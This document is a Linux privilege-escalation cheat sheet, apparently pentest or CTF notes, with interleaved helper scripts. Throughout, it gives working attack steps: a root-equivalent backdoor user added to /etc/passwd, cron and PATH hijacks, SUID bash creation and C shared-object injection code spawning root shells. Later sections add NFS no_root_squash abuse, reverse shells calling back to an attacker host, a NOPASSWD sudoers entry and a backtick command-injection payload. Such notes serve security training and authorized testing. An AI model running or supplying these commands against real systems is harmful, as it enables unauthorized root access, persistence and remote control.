Enumeration

  • id
  • sudo -l - what can we run using sudo
  • history - could have some juicy details in history
  • cat /etc/passwd
    • If you can somehow write to /etc/passwd:
      1. openssl passwd $newPassword (prints a crypt hash; newer openssl also accepts -6 for SHA-512)
      2. echo "$newUser:$hashAbove:0:0:root:/root:/bin/bash" >> /etc/passwd (UID 0 and GID 0 make the new user root-equivalent)
      3. or put $hashAbove in place of the x in the existing root line (root:x:0:0:root:/root:/bin/bash); a hash in /etc/passwd is used directly instead of the one in /etc/shadow, so root's password becomes $newPassword
  • uname -a - kernel version, for kernel exploits
    • cat /etc/issue - distribution and release
  • hostname
  • ps aux - running processes
    • watch -n 1 "ps aux | grep $searchTerm" - poll for a process that only appears periodically
  • ifconfig or ip a - interfaces and addresses (ipconfig is the Windows equivalent)
  • ss -anp or netstat -ano - what ports are open and what connections exist
  • dpkg -l - list applications installed by dpkg (rpm -qa on RPM-based systems)
  • find / -writable -type d 2>/dev/null - find writable directories
  • cat any /home/*/.*history files
  • check /home/*/.ssh and /root/.ssh for keys
  • su root (can’t hurt to try)
  • sudo tcpdump -i lo -A | grep -i "pass" - credentials in cleartext loopback traffic (only if sudo -l allows tcpdump)
  • ip neigh - IPv4 neighbour table
  • check /var, /opt, /usr/local/src and /usr/src for anything interesting
  • TCM Color Command: grep --color=always -rnw '/' -ie "$searchTerm" 2>/dev/null (searches the whole filesystem for the term and highlights the match in red)
  • From the directory you want to search: grep -r "$searchTerm" .
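The /etc/passwd trick above, rehearsed against a scratch copy so the line format and the hash step can be checked before touching the real file. This is an added example, not part of the original notes; the user name "backdoor", the password "Password1" and the scratch passwd contents are made up for the demo.

```shell
# Added example: build a passwd(5) entry that is root-equivalent (UID 0, GID 0)
# and append it to a passwd file given as an argument. The file is a scratch
# copy here; on a real target the argument would be /etc/passwd.

# hash_password PASSWORD -> crypt(3) hash; SHA-512 where openssl supports -6, else MD5
hash_password() {
    openssl passwd -6 "$1" 2>/dev/null || openssl passwd -1 "$1"
}

# make_root_entry USER HASH -> the colon-separated passwd line
make_root_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# append_root_user USER HASH FILE -> append the entry; refuse if USER already exists
append_root_user() {
    user=$1; hash=$2; file=$3
    if grep -q "^$user:" "$file"; then
        echo "user $user already present in $file" >&2
        return 1
    fi
    make_root_entry "$user" "$hash" >> "$file"
}

# count_uid0 FILE -> number of UID 0 accounts (a defender's check: should be exactly 1)
count_uid0() {
    awk -F: '$3 == 0 { n++ } END { print n+0 }' "$1"
}

# Constructed scratch copy standing in for /etc/passwd (placeholder "backdoor" user).
scratch=$(mktemp)
printf 'root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n' > "$scratch"
if command -v openssl >/dev/null 2>&1; then
    append_root_user backdoor "$(hash_password Password1)" "$scratch"
fi
echo "UID 0 accounts in $scratch: $(count_uid0 "$scratch")"
```

After su backdoor you are root; count_uid0 is the same check an integrity monitor or pwck -r would make, so expect the extra UID 0 line to be noticed and remove it when done.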

Privilege Escalation

Automated tools

  • linpeas.sh
  • unix-privesc-check
  • lse.sh

SUID Executables

SUID stands for “Set User ID”, and it is a special type of permission that can be given to a file so the file is always run with the permissions of the owner instead of the user executing it.

  • find / -user root -perm -4000 -print 2>/dev/null
  • find / -type f -perm -04000 -ls 2>/dev/null
  • find / -type f -perm -u=s 2>/dev/null | xargs ls -l
  • find / -perm -u=s -type f 2>/dev/null
  • find / -user root -perm -4000 -exec ls -ldb {} \;
  • Any of these works; they differ only in output. -perm -4000 matches the setuid bit; -perm /6000 matches setuid or setgid
  • drwxr-xr--
    • this is a directory with read/write/execute for the owner, read/execute for the group, and read for everyone else
    • if there is an s where the owner’s x would be, that is SUID (an s in the group’s x position is SGID, and a t in the last position is the sticky bit); a capital S or T means the bit is set but the matching execute bit is not
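The mode-string reading above, as an added example that is not part of the original notes: one function names the special bits in an ls -l mode string, another pulls the setuid files out of a listing. The listing it runs on is constructed; the paths and sizes in it are placeholders.

```shell
# Added example (not from the page): classify the special bits in an ls -l mode
# string and pull setuid files out of a listing.

# special_bits MODE -> names the special bits in a 10-character ls -l mode string.
# Lower-case s/t: bit set together with the execute bit. Upper-case S/T: bit set
# without the execute bit (e.g. chmod 4644), which is usually a misconfiguration.
special_bits() {
    mode=$1
    [ "${#mode}" -eq 10 ] || { echo "expected a 10-character mode string, got: $mode" >&2; return 1; }
    out=""
    case $(printf '%s' "$mode" | cut -c4) in      # owner execute position
        s) out="$out suid" ;;
        S) out="$out suid(no-exec)" ;;
    esac
    case $(printf '%s' "$mode" | cut -c7) in      # group execute position
        s) out="$out sgid" ;;
        S) out="$out sgid(no-exec)" ;;
    esac
    case $(printf '%s' "$mode" | cut -c10) in     # others execute position
        t) out="$out sticky" ;;
        T) out="$out sticky(no-exec)" ;;
    esac
    printf '%s\n' "${out# }"
}

# suid_from_listing FILE -> paths from ls -l style lines whose owner-execute slot is s or S
suid_from_listing() {
    awk 'substr($1, 4, 1) ~ /[sS]/ { print $NF }' "$1"
}

# Constructed listing standing in for: find / -perm -4000 -type f -exec ls -l {} \;
listing=$(mktemp)
cat > "$listing" <<'EOF'
-rwsr-xr-x 1 root root 59976 Jan  1 2024 /usr/bin/passwd
-rwxr-xr-x 1 root root 138208 Jan  1 2024 /usr/bin/ls
-rwsr-sr-x 1 root root 16784 Jan  1 2024 /opt/backup/bak
drwxrwxrwt 12 root root 4096 Jan  1 2024 /tmp
EOF
for m in -rwsr-xr-x drwxrwsr-x drwxrwxrwt -rwSr--r--; do
    printf '%-12s %s\n' "$m" "$(special_bits "$m")"
done
echo "setuid files in listing:"
suid_from_listing "$listing"          # /usr/bin/passwd and /opt/backup/bak
```

Anything unusual in the setuid list (custom binaries under /opt, copies of system tools, anything not packaged) is what to look at first; the stock ones like passwd are expected.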

Kernel Exploits

  • uname -a - check which kernel
  • lsmod - list loaded kernel modules
    • /sbin/modinfo $moduleName - details (version, path) of a module

Passwords and File Permissions

  • history
  • find /etc -type f -exec grep -i -I "pass" {} /dev/null \; 2>/dev/null
    • for the /etc directory
  • find / -name id_rsa 2>/dev/null (also id_ed25519, id_ecdsa and authorized_keys)

Sudo Escalations

  • sudo -l then “gtfobins.github.io”
  • Escalation via LD_PRELOAD - if sudo -l shows env_keep+=LD_PRELOAD, sudo keeps that variable, so you can point it at a shared object of your own; its constructor runs as root before any of the commands you are allowed to sudo and can drop you into a shell.
    • Code here: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld_preload-and-ld_library_path

Scheduled Tasks

  • cat /etc/crontab
  • ls -lah /etc/cron*
  • grep "CRON" /var/log/syslog - see which jobs actually ran and as whom
  • Take note of the PATH= line in the crontab: a job that calls a command without its full path resolves it through that PATH, so a writable directory early in it lets you supply the command
  • especially for jobs running as root
  • echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > $cronScript (when the script itself is writable)
    • then run /tmp/bash -p; the -p keeps the root effective UID instead of bash dropping it
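An added example (not from the original notes) that checks a crontab for the two conditions described above: a command given without a full path, which cron resolves through the crontab's PATH, and a script we can write to. It handles the 7-field /etc/crontab layout (min hour dom mon dow user command); @reboot-style lines are not parsed. The crontab it runs on is constructed and the script path is a scratch directory.

```shell
# Added example (not from the page): audit a system-crontab file for jobs whose
# command we could replace.

# audit_crontab FILE -> one line per job: user, classification, command
#   relative(...) : command has no '/', so cron resolves it through the PATH= line
#   writable      : absolute path the current user can modify
#   ok            : absolute path we cannot modify
audit_crontab() {
    crontab=$1
    path_line=$(grep '^PATH=' "$crontab" | tail -n 1 | cut -d= -f2-)
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$crontab" |
    while read -r min hour dom mon dow user cmd; do
        first=${cmd%% *}
        case $first in
            /*) if [ -w "$first" ]; then kind=writable; else kind=ok; fi ;;
            *)  kind="relative(PATH=$path_line)" ;;
        esac
        printf '%s\t%s\t%s\n' "$user" "$kind" "$cmd"
    done
}

# Constructed crontab: a scratch directory stands in for a root-owned script
# that was accidentally left writable.
scratch=$(mktemp -d)
printf '#!/bin/sh\necho rotating logs\n' > "$scratch/rotate.sh"
crontab_file="$scratch/crontab"
cat > "$crontab_file" <<EOF
# constructed /etc/crontab
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/5 * * * * root backup.sh
0 2 * * *   root $scratch/rotate.sh
30 3 * * *  root /usr/local/bin/cleanup
EOF
audit_crontab "$crontab_file"
```

A relative command is exploitable when some directory listed in that PATH before the one holding the real script is writable; a writable script is exploitable outright, as in the echo one-liner above.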

Shared Object Injection

strace $binary 2>&1 - strace intercepts and records the system calls which are called by a process and the signals which are received by a process.

  • then look for shared objects (.so) the binary tries to open that come back as -1 ENOENT (No such file or directory); if the directory is writable by you, you can supply that file and the binary will load it with its SUID privileges
  • you need a .c file to build the library, EX:
#include <stdio.h>
#include <stdlib.h>

/* constructor: runs when the library is loaded, before main() of the host binary */
static void inject() __attribute__((constructor));

void inject() {
	/* copy bash, make it SUID, and run it with -p so it keeps the root EUID */
	system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Then compile it as a shared object: gcc -shared -fPIC -o $outputLocation $exploitLocation.c (the variant gcc -shared -fPIC -nostartfiles -o file.so file.c also works)

  • the output name must match the library the binary asked for, i.e. the .so path that strace showed as missing
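An added example (not part of the original notes) of the strace sifting described above: one function pulls the .so paths that came back ENOENT out of a trace, the other keeps only those whose directory we can write to. The trace lines are constructed and the binary and library names in them are placeholders.

```shell
# Added example (not from the page): sift strace output for shared objects that
# the traced binary looked for and did not find, then keep the ones we could
# actually create.

# missing_libs FILE -> .so / .so.N paths that came back ENOENT in the trace.
# Non-library lookups such as /etc/ld.so.preload are deliberately excluded.
missing_libs() {
    grep 'ENOENT' "$1" |
    sed -n 's/.*"\([^"]*\.so\(\.[0-9][0-9]*\)*\)".*/\1/p'
}

# hijackable_libs FILE -> the subset whose parent directory we can write to.
# A bare name (no leading /) is resolved through the loader's search path, so it
# is reported separately for a manual check of LD_LIBRARY_PATH / ld.so.conf.
hijackable_libs() {
    missing_libs "$1" | while read -r lib; do
        case $lib in
            /*) if [ -w "$(dirname "$lib")" ]; then printf '%s\n' "$lib"; fi ;;
            *)  printf '%s (bare name, resolved via the loader search path)\n' "$lib" ;;
        esac
    done
}

# Constructed trace: $scratch stands in for a writable directory the binary searches.
scratch=$(mktemp -d)
trace="$scratch/trace.txt"
cat > "$trace" <<EOF
execve("/usr/local/bin/suid-helper", ["suid-helper"], 0x7ffd0c1a2b40 /* 20 vars */) = 0
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "$scratch/libplugin.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open("/proc/nope/libcalc.so.1", O_RDONLY) = -1 ENOENT (No such file or directory)
EOF
echo "missing libraries:";   missing_libs "$trace"
echo "in writable dirs:";    hijackable_libs "$trace"     # only $scratch/libplugin.so
```

Feed it the real output with strace -f $binary 2>&1 > trace.txt; the path it reports is the -o argument for the gcc line above.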

Related: a local root vulnerability in nginx (an HTTP and reverse proxy server), CVE-2016-1247: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

Escalation via Environmental Variables

Run the find SUID command, then run strings on the binary if you don’t know what it does. If it starts a service by name (e.g. service apache2 start) rather than by full path, the name is resolved through PATH, so print $PATH.

  • If it doesn’t use a direct path:
    • write the payload: printf '#include <stdlib.h>\n#include <unistd.h>\nint main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }\n' > /tmp/service.c
    • setgid(0)/setuid(0) turn the root effective ID inherited from the SUID binary into a real root ID, so the bash that follows does not drop privileges
    • then gcc /tmp/service.c -o /tmp/service
    • then: export PATH=/tmp:$PATH
    • This means that when the binary calls service, the shell checks /tmp first as it is the start of the PATH, and runs ours
  • If it does use a direct path (like /usr/sbin/service) and the shell it spawns is bash:
    • function /usr/sbin/service() { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; }
    • export -f /usr/sbin/service
    • then run the SUID binary; this relies on the child bash importing an exported function whose name contains a slash, which older bash versions do and newer ones may refuse, so verify it on the target
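The relative-path case above, rehearsed in a scratch directory as an added example that is not part of the original notes. A harmless marker script stands in for the setuid-0 payload so the mechanism (name resolved through PATH, our directory first) can be seen without a SUID binary; the command name "service" is taken from the notes, everything else is made up.

```shell
# Added example (not from the page): rehearse the PATH hijack in a scratch
# directory with a marker script instead of the setuid-0 payload.

# resolve_with_path NAME DIR -> the file NAME resolves to once DIR is first in PATH
resolve_with_path() {
    ( PATH="$2:$PATH"; command -v "$1" )
}

# plant_fake NAME DIR -> drop an executable called NAME into DIR
plant_fake() {
    printf '#!/bin/sh\necho "hijacked %s running as $(id -un)"\n' "$1" > "$2/$1"
    chmod 755 "$2/$1"
}

# run_hijacked NAME DIR -> run NAME the way a binary calling system("NAME ...")
# would, i.e. by bare name through PATH, with DIR in front
run_hijacked() {
    ( PATH="$2:$PATH"; "$1" )
}

scratch=$(mktemp -d)
plant_fake service "$scratch"
echo "before: $(command -v service || echo '(service not on PATH)')"
echo "after:  $(resolve_with_path service "$scratch")"   # $scratch/service
run_hijacked service "$scratch"
```

Against a real SUID binary the script is replaced by the compiled /tmp/service and the PATH change is done with export in the shell that then runs the binary; the "running as" line would then show root.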

Capabilities

getcap -r / 2>/dev/null - this will show up during linpeas, but it’s still good to know; look for cap_setuid or cap_setgid (the binary may change its own UID/GID) and check the binary on gtfobins

NFS Root Squashing

  • cat /etc/exports (on the target; showmount -e $targetIP from kali lists the same exports remotely)
    • if an export says no_root_squash, root on a client that mounts it is not mapped to nobody: files we create as root on kali are owned by root on the target
    • so a normal user on the target can be handed a root-owned SUID binary; from kali, as root:
  • mkdir /tmp/mountme
  • mount -o rw,vers=2 $targetIP:/tmp /tmp/mountme (the export belongs to the target; if the mount fails, try without vers=2)
  • printf '#include <stdlib.h>\n#include <unistd.h>\nint main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }\n' > /tmp/mountme/x.c
  • gcc /tmp/mountme/x.c -o /tmp/mountme/x (add -static, or build on the target, if kali and the target differ in architecture or libc)
  • chmod +s /tmp/mountme/x
  • then from the target, as the low-privileged user: /tmp/x
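An added example (not part of the original notes) of the /etc/exports check above: it parses an exports-style file and prints every export and client whose option list contains no_root_squash. The file contents are constructed and the paths and client addresses are placeholders.

```shell
# Added example (not from the page): parse an /etc/exports-style file and report
# the exports whose options contain no_root_squash.

# no_root_squash_exports FILE -> "DIR CLIENT" for every export option set that
# contains no_root_squash (root on that client stays root on the export)
no_root_squash_exports() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | while read -r dir rest; do
        (
            set -f                       # keep '*' in client specs from globbing
            for spec in $rest; do
                client=${spec%%"("*}
                opts=${spec#*"("}; opts=${opts%")"}
                case ",$opts," in
                    *,no_root_squash,*) printf '%s %s\n' "$dir" "$client" ;;
                esac
            done
        )
    done
}

# Constructed exports file; the share on the second line is the classic lab setup.
exports=$(mktemp)
cat > "$exports" <<'EOF'
# constructed /etc/exports
/srv/share   10.0.0.0/24(rw,sync,root_squash) 10.0.0.5(rw,no_root_squash)
/tmp         *(rw,sync,no_root_squash)
/home/data   *(ro)
EOF
no_root_squash_exports "$exports"     # /srv/share 10.0.0.5 and /tmp *
```

Only the client entries it prints are usable: for /srv/share above, root is squashed for the whole 10.0.0.0/24 range except the single host 10.0.0.5, so the mount has to come from that address. The export also needs rw for the SUID binary to be written.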

Other

Reverse shells:

  • busybox nc $kaliIP 4444 -e sh
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $kaliIP $kaliPort >/tmp/f

Add a directory to PATH: export PATH="/usr/lib/gcc/i486-linux-gnu/4.6/:$PATH"

If you can edit /etc/sudoers (or drop a file into /etc/sudoers.d when the file has #includedir):

  • echo "$user ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
  • then visudo -c to confirm the file still parses; a syntax error locks everyone out of sudo

Remember that backticks are evaluated before the surrounding command, so a parameter that lands in a shell command line can carry its own command inside them. Ex:

  • In URL: 10.10.186.101:8081/ping?ip=`ls` (URL-encoded: ip=%60ls%60); the output of ls replaces the backticked part before ping runs